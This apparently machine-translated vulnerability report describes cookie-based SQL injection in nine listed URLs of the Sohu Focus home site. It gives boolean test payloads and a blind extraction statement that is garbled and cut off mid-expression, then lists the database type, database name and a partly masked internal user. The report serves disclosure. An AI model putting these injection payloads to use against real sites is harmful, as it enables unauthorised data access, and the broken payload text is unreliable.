Multiple Cookie injection packages in Sohu focus home

Multiple Cookie injection packages in Sohu focus home

Cookie injection exists in the following URLs. The vendor must fix the vulnerability.

1. http://home.focus.cn/newscenter/newscenter.php? Subject_id = 33 & show_citynum= 549755813888

2. http://home.focus.cn/jiancaicheng/index.php? City_id = 39

3. http://home.focus.cn/elite/article_index.php? Group_id = 2513 & class_id = 857

4. http://home.focus.cn/group/class_photos_more.php? Type = pic & class_id = 18

5. http://home.focus.cn/msglist/1703? Chkusr_id = 11179/

6. http://home.focus.cn/group/photo.php? Group_id = 1702

7. http://home.focus.cn/group/photoshow.php? Photo_id = 4160673 & group_id = 1702

8. http://home.focus.cn/life/news_week.php? Days = 7 & category_id = 2

9. http://home.focus.cn/life/newscenter.php? Subject_id = 9

The following describes how to add a map with 2nd urls:

Vulnerability url: http://home.focus.cn/jiancaicheng/index.php? City_id = 39

Cookie injection variable: city_id = 39

Test payload (put in Cookie)

1. city_id = 39 anD 1 = 1 normal page

 

2. city_id = 39 anD 1 = 11 returns different results

Explain the database name statement: city_id = 39 anD (select ascii (substr (database (), 100)>

The guessing process is omitted. The result is as follows:

Injection Type: Numeric

Database Type: MySQL

Database Name: home

User name: readonly@10.xx.xx.x

The injection methods in other cases are the same as those in the above case.

 

How to fix a vulnerability: Check and fix the vulnerability so that hackers do not want to drill into the vulnerability.